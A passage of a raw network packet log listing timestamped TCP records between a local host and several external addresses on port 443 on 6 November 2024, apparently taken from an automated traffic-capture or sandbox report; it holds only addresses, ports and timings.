                                                                                                                                              Nov 6, 2024 16:56:06.018613100 CET44349881188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.019651890 CET44349881188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.019785881 CET49881443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.019953012 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.019979000 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.020032883 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.020051003 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.020081997 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.020100117 CET49881443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.020100117 CET49881443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.020107031 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.020251989 CET44349881188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.020410061 CET44349881188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.020467997 CET49881443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.020467997 CET49881443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.020467997 CET49881443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.020487070 CET44349881188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.020520926 CET49885443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.020565987 CET44349885188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.020644903 CET49885443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.020754099 CET49881443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.020926952 CET49885443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.020940065 CET44349885188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.021253109 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.021270037 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.021328926 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.021336079 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.021404028 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.022187948 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.022203922 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.022279024 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.022288084 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.022366047 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.069808960 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.069875002 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.069900990 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.069942951 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.069966078 CET49878443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:06.069984913 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.070005894 CET49878443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:06.070022106 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.070161104 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.070182085 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.070261002 CET49878443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:56:06.070272923 CET44349878188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.070297003 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.070303917 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.070365906 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.074048996 CET49886443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.074103117 CET44349886188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.074378967 CET49886443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.074667931 CET49886443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.074677944 CET44349886188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.128755093 CET44349882188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.129811049 CET49882443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.129829884 CET44349882188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.130956888 CET44349882188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.131056070 CET49882443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.131402016 CET49882443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.131421089 CET49882443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.131455898 CET44349882188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.131479979 CET49882443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.131505013 CET49882443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.131850958 CET49887443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.131894112 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.132179976 CET49887443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.132390022 CET49887443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.132400990 CET44349887188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.137834072 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.137856007 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.137922049 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.137933969 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.137989044 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.138710022 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.138726950 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.138792038 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.138798952 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.138881922 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.139506102 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.139524937 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.139584064 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.139590025 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.139653921 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.140012026 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.140034914 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.140095949 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.140101910 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.140166998 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.142735004 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.142750978 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.142811060 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.142817974 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.142858982 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.143347979 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.143363953 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.143424988 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.143429041 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.143466949 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.178611994 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.178637981 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.178700924 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.178724051 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.178776979 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.178792953 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.179599047 CET44349879188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.179651022 CET44349879188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.179676056 CET44349879188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.179722071 CET49879443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.179744005 CET44349879188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.179769039 CET44349879188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.179824114 CET49879443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.180845022 CET49879443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.180866003 CET44349879188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.254765034 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.254795074 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.254884005 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.254904032 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.255011082 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.255084991 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.255101919 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.255157948 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.255163908 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.255203009 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.255681038 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.255702972 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.255758047 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.255764961 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.255820990 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.256151915 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.256172895 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.256242037 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.256247997 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.256300926 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.256540060 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.256561995 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.256634951 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.256643057 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.256827116 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.258060932 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.258085012 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.258162022 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.258167982 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.258225918 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.258239031 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.258255005 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.258332968 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.258338928 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.258385897 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.258434057 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.258450985 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.258506060 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.258512020 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.258579969 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.258621931 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.258639097 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.258698940 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.258706093 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.258783102 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.258955956 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.258976936 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.259021044 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.259027004 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.259073019 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.259105921 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.259831905 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.259851933 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.259924889 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.259932995 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.260011911 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.260035992 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.260056973 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.260108948 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.260114908 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.260142088 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.260171890 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.295953989 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.295984030 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.296346903 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.296369076 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.296385050 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.296411037 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.296436071 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.296443939 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.296518087 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.329751968 CET44349883188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.330185890 CET49883443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.330219030 CET44349883188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.331351042 CET44349883188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.331453085 CET49883443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.331830978 CET49883443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.331830978 CET49883443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.331830978 CET49883443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.331932068 CET44349883188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.332035065 CET49883443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.332185984 CET49888443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.332237959 CET44349888188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.332357883 CET49888443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.332637072 CET49888443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:56:06.332652092 CET44349888188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.371982098 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.372009039 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.372117043 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.372164011 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.372231960 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.372397900 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.372416973 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.372495890 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.372504950 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.372517109 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.372539997 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.372618914 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.372618914 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.372627974 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.372898102 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.372961044 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.372982979 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.373039961 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.373047113 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.373059988 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.373080969 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.373095989 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.373104095 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.373141050 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.373176098 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.373183966 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.373202085 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.373253107 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.373258114 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.373311043 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.373642921 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.373663902 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.373763084 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.373769045 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.373807907 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.373842001 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.373862028 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.373966932 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.373975039 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.373986006 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.374007940 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.374088049 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.374094009 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.374245882 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.374249935 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.374260902 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.374274015 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.374295950 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.374305010 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.374327898 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.374351025 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.374397993 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.374413967 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.374478102 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.374485016 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.374713898 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.374835014 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.374857903 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.374922037 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.374929905 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.374941111 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.374959946 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.374991894 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.374999046 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.375024080 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.375077009 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.375097036 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.375122070 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.375171900 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.375179052 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.375216961 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.375458956 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.375478029 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.375577927 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.375607014 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.375618935 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.375644922 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.375654936 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.375705957 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.375809908 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.375835896 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.375890017 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.375895977 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.375953913 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.376040936 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.376061916 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.376126051 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.376132965 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.376157999 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.376255035 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.376280069 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.376322031 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.376331091 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.376353979 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.376477957 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.376496077 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.376532078 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.376539946 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.376562119 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.376597881 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.376616955 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.376646042 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.376652002 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.376667976 CET49874443192.168.2.1813.107.246.45
                                                                                                                                              Nov 6, 2024 16:56:06.376930952 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.376946926 CET4434987413.107.246.45192.168.2.18
                                                                                                                                              Nov 6, 2024 16:56:06.376976967 CET49874443192.168.2.1813.107.246.45
